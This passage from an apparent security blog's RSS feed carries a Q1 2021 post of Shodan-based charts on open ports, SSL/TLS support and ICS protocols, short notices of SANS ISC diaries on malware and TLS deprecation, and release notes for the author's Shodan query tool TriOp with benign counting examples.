        <atom:modified>Mon, 05 Apr 2021 11:30:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/04/05/open_ports_q1_2021/</guid>
        <description>The first quarter of 2020 is behind us, which means it&amp;rsquo;s time for another look at some of the interesting ports accessible on public IPs. This time however, we will take a look at how the internet as a whole changed during the past 3 months in terms of accessible ports, but also at specific changes related to support of different versions of SSL and TLS.
As always, the data, on which the following charts are based, have been gathered using Shodan.</description>
        <content:encoded>&lt;p&gt;The first quarter of 2020 is behind us, which means it&amp;rsquo;s time for another look at some of the interesting ports accessible on public IPs. This time however, we will take a look at how the internet as a whole changed during the past 3 months in terms of accessible ports, but also at specific changes related to support of different versions of SSL and TLS.&lt;/p&gt;
&lt;p&gt;As always, the data, on which the following charts are based, have been gathered using &lt;a href=&#34;https://www.shodan.io/&#34;&gt;Shodan&lt;/a&gt;. Therefore bear in mind that although the charts should give us a good enough view of more significant changes, they may not be completely accurate (see the &lt;a href=&#34;https://untrustednetwork.net/en/2020/09/30/open-ports-statistics-for-q3-2020/&#34;&gt;first post with quarterly statistics&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Should you be interested in the port situation in the Czech Republic, you may find corresponding charts &lt;a href=&#34;https://untrustednetwork.net/cs/2021/04/05/open_ports_q1_2021/&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Bellow, you may find charts for the following protocols and ports:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#ssh&#34;&gt;SSH (port 22)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#telnet&#34;&gt;Telnet (port 23)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#dns&#34;&gt;DNS (port 53)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#ntp&#34;&gt;NTP (port 123)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#snmp&#34;&gt;SNMP (port 161)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#smb&#34;&gt;SMB (port 445)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#rdp&#34;&gt;RDP (port 3389)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id=&#34;a-hrefwebweba&#34;&gt;&lt;a href=&#34;#web&#34;&gt;Web&lt;/a&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#web&#34;&gt;HTTP (port 80)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#https&#34;&gt;HTTPS (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#htls13&#34;&gt;TLS 1.3 (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#htls12&#34;&gt;TLS 1.2 (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#htls11&#34;&gt;TLS 1.1 (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#htls10&#34;&gt;TLS 1.0 (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#hssl3&#34;&gt;SSL 3.0 (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#hssl2&#34;&gt;SSL 2.0 (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id=&#34;a-hrefemaile-maila&#34;&gt;&lt;a href=&#34;#email&#34;&gt;E-mail&lt;/a&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#smtp&#34;&gt;SMTP (port 25)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#smtps&#34;&gt;SMTPS (port 465)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#imap&#34;&gt;IMAP (port 143)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#imaps&#34;&gt;IMAPS (port 993)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#pop3&#34;&gt;POP3 (port 110)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#pop3s&#34;&gt;POP3S (port 995)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id=&#34;a-hreftlsssltlsa&#34;&gt;&lt;a href=&#34;#tls&#34;&gt;SSL/TLS&lt;/a&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#tls13&#34;&gt;TLS 1.3 (all ports)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#tls12&#34;&gt;TLS 1.2 (all ports)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#tls11&#34;&gt;TLS 1.1 (all ports)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#tls10&#34;&gt;TLS 1.0 (all ports)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#ssl3&#34;&gt;SSL 3.0 (all ports)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#ssl2&#34;&gt;SSL 2.0 (all ports)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id=&#34;a-hreficsindustrial-control-systems-icsa&#34;&gt;&lt;a href=&#34;#ics&#34;&gt;Industrial Control Systems (ICS)&lt;/a&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#ics_all&#34;&gt;All ICS protocols&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#modbus&#34;&gt;Modbus (port 502)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#eibnet&#34;&gt;EIBnet/IP (port 3671)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#bacnet&#34;&gt;BACnet/IP (port 47808)&lt;br /&gt;
&lt;br&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h4 id=&#34;ssh&#34;&gt;SSH (port 22)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/ssh.png&#34; alt=&#34;SSH&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;telnet&#34;&gt;Telnet (port 23)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/telnet.png&#34; alt=&#34;Telnet&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;dns&#34;&gt;DNS (port 53)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/dns.png&#34; alt=&#34;DNS&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;ntp&#34;&gt;NTP (port 123)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/ntp.png&#34; alt=&#34;NTP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;snmp&#34;&gt;SNMP (port 161)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/snmp.png&#34; alt=&#34;SNMP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;smb&#34;&gt;SMB (port 445)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/smb.png&#34; alt=&#34;SMB&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;rdp&#34;&gt;RDP (port 3389)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/rdp.png&#34; alt=&#34;RDP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;br&gt;
&lt;h2 id=&#34;web&#34;&gt;Web&lt;/h2&gt;
&lt;h4 id=&#34;http&#34;&gt;HTTP (port 80)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/http.png&#34; alt=&#34;HTTP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;https&#34;&gt;HTTPS (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/https.png&#34; alt=&#34;HTTPS&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;htls13&#34;&gt;TLS 1.3 (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/htls13.png&#34; alt=&#34;HTTPS/TLS 1.3&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;htls12&#34;&gt;TLS 1.2 (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/htls12.png&#34; alt=&#34;HTTPS/TLS 1.2&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;htls11&#34;&gt;TLS 1.1 (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/htls11.png&#34; alt=&#34;HTTPS/TLS 1.1&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;htls10&#34;&gt;TLS 1.0 (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/htls10.png&#34; alt=&#34;HTTPS/TLS 1.0&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;hssl3&#34;&gt;SSL 3.0 (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/hssl3.png&#34; alt=&#34;HTTPS/SSL 3.0&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;hssl2&#34;&gt;SSL 2.0 (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/hssl2.png&#34; alt=&#34;HTTPS/SSL 2.0&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;br&gt;
&lt;h2 id=&#34;email&#34;&gt;E-mail&lt;/h2&gt;
&lt;h4 id=&#34;smtp&#34;&gt;SMTP (port 25)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/smtp.png&#34; alt=&#34;SMTP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;smtps&#34;&gt;SMTPS (port 465)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/smtps.png&#34; alt=&#34;SMTPS&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;imap&#34;&gt;IMAP (port 143)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/imap.png&#34; alt=&#34;IMAP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;imaps&#34;&gt;IMAPS (port 993)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/imaps.png&#34; alt=&#34;IMAPS&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;pop3&#34;&gt;POP3 (port 110)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/pop3.png&#34; alt=&#34;POP3&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;pop3s&#34;&gt;POP3S (port 995)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/pop3s.png&#34; alt=&#34;POP3S&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;br&gt;
&lt;h2 id=&#34;tls&#34;&gt;SSL/TLS&lt;/h2&gt;
&lt;h4 id=&#34;tls13&#34;&gt;TLS 1.3 (all ports)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/tls13.png&#34; alt=&#34;HTTPS/TLS 1.3&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;tls12&#34;&gt;TLS 1.2 (all ports)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/tls12.png&#34; alt=&#34;HTTPS/TLS 1.2&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;tls11&#34;&gt;TLS 1.1 (all ports)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/tls11.png&#34; alt=&#34;HTTPS/TLS 1.1&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;tls10&#34;&gt;TLS 1.0 (all ports)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/tls10.png&#34; alt=&#34;HTTPS/TLS 1.0&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;ssl3&#34;&gt;SSL 3.0 (all ports)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/ssl3.png&#34; alt=&#34;HTTPS/SSL 3.0&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;ssl2&#34;&gt;SSL 2.0 (all ports)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/ssl2.png&#34; alt=&#34;HTTPS/SSL 2.0&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;br&gt;
&lt;h2 id=&#34;ics&#34;&gt;Industrial Control Systems&lt;/h2&gt;
&lt;h4 id=&#34;ics_all&#34;&gt;All ICS protocols&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/ics.png&#34; alt=&#34;All ICS protocols&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;modbus&#34;&gt;Modbus (port 502)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/modbus.png&#34; alt=&#34;Modbus&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;eibnet&#34;&gt;EIBnet/IP (port 3671)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/eibnet.png&#34; alt=&#34;EIBnet&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;bacnet&#34;&gt;BACnet/IP (port 47808)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q1/bacnet.png&#34; alt=&#34;BACnet&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/ports/2021/q1/htls13.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SSL</category>
            
          
            
              <category>TLS</category>
            
          
            
              <category>Telnet</category>
            
          
            
              <category>DNS</category>
            
          
            
              <category>NTP</category>
            
          
            
              <category>SNMP</category>
            
          
            
              <category>SMB</category>
            
          
            
              <category>RDP</category>
            
          
            
              <category>HTTP</category>
            
          
            
              <category>HTTPS</category>
            
          
            
              <category>SMTP</category>
            
          
            
              <category>SMTPS</category>
            
          
            
              <category>IMAP</category>
            
          
            
              <category>IMAPS</category>
            
          
            
              <category>POP3</category>
            
          
            
              <category>POP3S</category>
            
          
            
              <category>ICS</category>
            
          
            
              <category>Modbus</category>
            
          
            
              <category>EIBnet</category>
            
          
            
              <category>BACnet</category>
            
          
            
              <category>Shodan</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
          
            
              <category>Open port statistics</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Old TLS versions - gone, but not forgotten... well, not really &#39;gone&#39; either</title>
        <link>https://untrustednetwork.net/en/2021/03/30/tls_deprecation/</link>
        <pubDate>Tue, 30 Mar 2021 10:20:00 +0200</pubDate>
        
        <atom:modified>Tue, 30 Mar 2021 10:20:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/03/30/tls_deprecation/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at changes in the number of web servers, which support TLS 1.0 and TLS 1.1&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/diary/27260&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at changes in the number of web servers, which support TLS 1.0 and TLS 1.1&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>TLS</category>
            
          
            
              <category>SSL</category>
            
          
            
              <category>Shodan</category>
            
          
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - 50 years of malware? Not really. 50 years of computer worms? That&#39;s a different story...</title>
        <link>https://untrustednetwork.net/en/2021/03/16/50-years-of-worms/</link>
        <pubDate>Tue, 16 Mar 2021 08:20:00 +0100</pubDate>
        
        <atom:modified>Tue, 16 Mar 2021 08:20:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/03/16/50-years-of-worms/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at Creeper, the first computer worm, which was created 50 years ago - according to some sources, on this very day in 1971&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/diary/27208&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at Creeper, the first computer worm, which was created 50 years ago - according to some sources, on this very day in 1971&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Malware</category>
            
          
            
              <category>Worm</category>
            
          
            
              <category>Creeper</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>TriOp update - version 1.2</title>
        <link>https://untrustednetwork.net/en/2021/03/14/triop-update-version-1.2/</link>
        <pubDate>Sun, 14 Mar 2021 14:00:00 +0100</pubDate>
        
        <atom:modified>Sun, 14 Mar 2021 14:00:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/03/14/triop-update-version-1.2/</guid>
        <description>I’ve published version 1.2 of TriOp today. A bug was present in the &amp;ldquo;add&amp;rdquo; mode in version 1.1, which resulted in incorrect behavior when parameterized queries were present in search files, and this update fixes it.
When using the &amp;ldquo;add&amp;rdquo; mode, it is now possible to specify a filter (&amp;ndash;filter), which determines what parameter from the original search file will be added to every new query. If filter is ommited, no parameter will be appended to newly added queries.</description>
        <content:encoded>&lt;p&gt;I’ve published version 1.2 of &lt;a href=&#34;https://untrustednetwork.net/en/triop/&#34;&gt;TriOp&lt;/a&gt; today. A bug was present in the &amp;ldquo;add&amp;rdquo; mode in version 1.1, which resulted in incorrect behavior when parameterized queries were present in search files, and this update fixes it.&lt;br /&gt;
When using the &amp;ldquo;add&amp;rdquo; mode, it is now possible to specify a filter (&amp;ndash;filter), which determines what parameter from the original search file will be added to every new query. If filter is ommited, no parameter will be appended to newly added queries.&lt;/p&gt;
&lt;p&gt;As alway, you may download the latest version of TriOp from &lt;a href=&#34;https://github.com/NettleSec/TriOp&#34;&gt;my GitHub&lt;/a&gt;.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Tool</category>
            
          
            
              <category>TriOp</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
      </item>
      
      <item>
        <title>TriOp update - version 1.1</title>
        <link>https://untrustednetwork.net/en/2021/03/08/triop-update-version-1.1/</link>
        <pubDate>Mon, 08 Mar 2021 11:00:00 +0100</pubDate>
        
        <atom:modified>Mon, 08 Mar 2021 11:00:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/03/08/triop-update-version-1.1/</guid>
        <description>I’ve published version 1.1 of TriOp today. I’ve added CVEs for the recent Exchange vulnerabilities to the vulnerability search list, since Shodan is now capable of detecting systems affected by them. In response to a request from the CSIRT community, I’ve also added the option for use of arbitrary filter along with a list of parameters.
In version 1.0, it was only possible to generate composite searches based on list of countries, however in version 1.</description>
        <content:encoded>&lt;p&gt;I’ve published version 1.1 of &lt;a href=&#34;https://untrustednetwork.net/en/triop/&#34;&gt;TriOp&lt;/a&gt; today. I’ve added CVEs for the recent &lt;a href=&#34;https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/&#34;&gt;Exchange vulnerabilities&lt;/a&gt; to the vulnerability search list, since Shodan is now &lt;a href=&#34;https://twitter.com/shodanhq/status/1367525621065261062&#34;&gt;capable of detecting systems affected by them&lt;/a&gt;. In response to a request from the CSIRT community, I’ve also added the option for use of arbitrary filter along with a list of parameters.&lt;br /&gt;
In version 1.0, it was only possible to generate composite searches based on list of countries, however in version 1.1, one may specify any filter (i.e. not just “country”) for use with the list of parameters.&lt;br /&gt;
Previously, one could specify a list of searches (-s/-S) and a list of countries (-c/-C) and TriOp would run each search for each specified country and even potentially output results for each country into a specific file (&amp;ndash;country_names).&lt;br /&gt;
In the updated version, one may specify an arbitrary filter (&amp;ndash;filter) and a list of parameters for that filter (-p/-P) along with a list of searches (-s/-S) and the result will be the same. The “one output file per parameter” option is available as well (&amp;ndash;filter_names).&lt;br /&gt;
What I assume will be of most useful when it comes to this feature, will be the filter “net” – the following example shows how a command using it might look:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&#34;language-command&#34; data-lang=&#34;command&#34;&gt;triop.py -s &amp;quot;port:80,port:443&amp;quot; --filter net -p &amp;quot;200.0.0.0/16,200.1.0.0/16&amp;quot;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;in which case, the output might look similar to:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&#34;language-triop&#34; data-lang=&#34;triop&#34;&gt;Current IP count for query port:80 net:&amp;quot;200.0.0.0/16&amp;quot; is 1643
Current IP count for query port:443 net:&amp;quot;200.0.0.0/16&amp;quot; is 1474
Current IP count for query port:80 net:&amp;quot;200.1.0.0/16&amp;quot; is 819
Current IP count for query port:443 net:&amp;quot;200.1.0.0/16&amp;quot; is 798
&lt;/code&gt;&lt;/pre&gt;&lt;br&gt;
&lt;p&gt;A country search could be done in the following manner:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&#34;language-command&#34; data-lang=&#34;command&#34;&gt;triop.py -s &amp;quot;port:22,port:23&amp;quot; --filter country -p &amp;quot;CZ,DE&amp;quot;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;and the output would be the same as with the use of the -c option:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&#34;language-triop&#34; data-lang=&#34;triop&#34;&gt;Current IP count for query port:22 country:&amp;quot;CZ&amp;quot; is 83007
Current IP count for query port:23 country:&amp;quot;CZ&amp;quot; is 21143
Current IP count for query port:22 country:&amp;quot;DE&amp;quot; is 1467418
Current IP count for query port:23 country:&amp;quot;DE&amp;quot; is 31595
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The original “country” options are still present but will be removed in future versions.&lt;/p&gt;
&lt;p&gt;You may download the latest version of TriOp from &lt;a href=&#34;https://github.com/NettleSec/TriOp&#34;&gt;my GitHub&lt;/a&gt;.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Tool</category>
            
          
            
              <category>TriOp</category>
            
          
            
              <category>Shodan</category>
            
          
            
              <category>Vulnerability</category>
            
          
            
              <category>Exchange</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Qakbot in a response to Full Disclosure post</title>
        <link>https://untrustednetwork.net/en/2021/02/23/sans-isc-diary-qakbot-in-a-response-to-full-disclosure-post/</link>
        <pubDate>Tue, 23 Feb 2021 11:30:00 +0100</pubDate>
        
        <atom:modified>Tue, 23 Feb 2021 11:30:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/02/23/sans-isc-diary-qakbot-in-a-response-to-full-disclosure-post/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at an interesting e-mail message carrying Qakbot downloader, which appeared to be sent in a response to a historical Full Disclosure mailing list post&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/diary/27130&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at an interesting e-mail message carrying Qakbot downloader, which appeared to be sent in a response to a historical Full Disclosure mailing list post&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Malware</category>
            
          
            
              <category>Qakbot</category>
            
          
            
              <category>Macro</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Agent Tesla hidden in a historical anti-malware tool</title>
        <link>https://untrustednetwork.net/en/2021/02/11/sans-isc-diary-agent-tesla-hidden-in-a-historical-anti-malware-tool/</link>
        <pubDate>Thu, 11 Feb 2021 08:20:00 +0100</pubDate>
        
        <atom:modified>Thu, 11 Feb 2021 08:20:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/02/11/sans-isc-diary-agent-tesla-hidden-in-a-historical-anti-malware-tool/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at an interesting sample of Agent Tesla, which was hidden in the code of a legitimate historical anti-malware tool&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/diary/27088&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at an interesting sample of Agent Tesla, which was hidden in the code of a legitimate historical anti-malware tool&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Malware</category>
            
          
            
              <category>Agent Tesla</category>
            
          
            
              <category>Malware Analysis</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - TriOp - tool for gathering (not just) security-related data from Shodan.io</title>
        <link>https://untrustednetwork.net/en/2021/01/27/sans-isc-diary-triop-tool-for-gathering-not-just-security-related-data-from-shodan.io/</link>
        <pubDate>Wed, 27 Jan 2021 11:00:00 +0100</pubDate>
        
        <atom:modified>Wed, 27 Jan 2021 11:00:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/01/27/sans-isc-diary-triop-tool-for-gathering-not-just-security-related-data-from-shodan.io/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at TriOp - my recently published tool, which enables anyone to periodically gather interesting data from Shodan.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/diary/27034&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at &lt;a href=&#34;https://untrustednetwork.net/en/triop/&#34;&gt;TriOp&lt;/a&gt; - my recently published tool, which enables anyone to periodically gather interesting data from &lt;a href=&#34;https://www.shodan.io/&#34;&gt;Shodan&lt;/a&gt;.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
